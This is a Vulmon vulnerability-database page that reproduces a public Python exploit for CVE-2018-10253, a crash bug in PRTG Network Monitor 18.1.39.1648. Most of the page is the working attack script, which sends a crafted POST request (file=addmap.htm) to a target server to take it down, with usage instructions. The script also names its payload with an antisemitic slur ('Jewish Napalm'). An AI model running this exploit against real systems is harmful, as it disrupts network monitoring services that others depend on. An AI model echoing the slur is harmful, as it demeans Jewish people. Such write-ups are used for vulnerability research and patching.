Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

PRTG 18.1.39.1648 Stack Overflow

Related Vulnerabilities: CVE-2018-10253  
Publish Date: 23 Apr 2018
Author: Lucas Carmo
Source 
                							

                # Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
 
#!/usr/bin/python
 
import requests
import sys
import os
import re
import socket
 
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
     aaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaa  aaa    aaaa   aaa aaaaaa aaaaaaa  aaaaaa aaa     aaaa   aaaa
     aaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaa  aaa    aaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaaaa aaaaa
     aaaaaaaaa  aaa aa aaaaaaaaaaaaaaaaaaaaaa    aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaaaaaaaaaa
aa   aaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa     aaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa    aaa aaaaaaaaa  aaaaaa     aaa  aaaaaaaaaaaaaa aaa aaa
 aaaaaa aaaaaaaa aaaaaaaa aaaaaaaaaaaaaa  aaa    aaa  aaaaaaaa  aaaaaa     aaa  aaaaaaaaaaaaaa     aaa
"""
 
 
banner2 = """
                                            Author: @Lucas "luriel" Carmo
"""
 
os.system('clear')
 
print(green+banner)
print(yellow+banner2)
print(normal)
 
def check_http(url):
    pattern = re.compile("http://")
    return re.search(pattern, url)
 
def sanitize_url(url):
    if(not check_http(url)):
        return "http://" + url
    return url
 
def check_server(url):
    r = requests.get(url, timeout=4)
    code = r.status_code
 
def send_jewish_payload(url):
    payload = {'file':'addmap.htm'}
    r = requests.post(url, params=payload)
 
def main():
    try:
        if len(sys.argv) <= 3 and len (sys.argv) >= 2:
            try:
                url = sanitize_url(sys.argv[1])
                print(' [#] LOADING!')
                if (check_server(url) != 404):
                    send_jewish_payload(url)
                else:
                    print(' [!] Server shutdown or not found')
            except requests.exceptions.ConnectionError:
                print(' [~] BOOOOOM! PRTG Server has been exploded!')
            except requests.exceptions.InvalidURL:
                print(' [!] Invalid URL')
            except requests.exceptions.Timeout:
                print(' [!] Connection Timeout\n')
        else:
            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
    main()


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started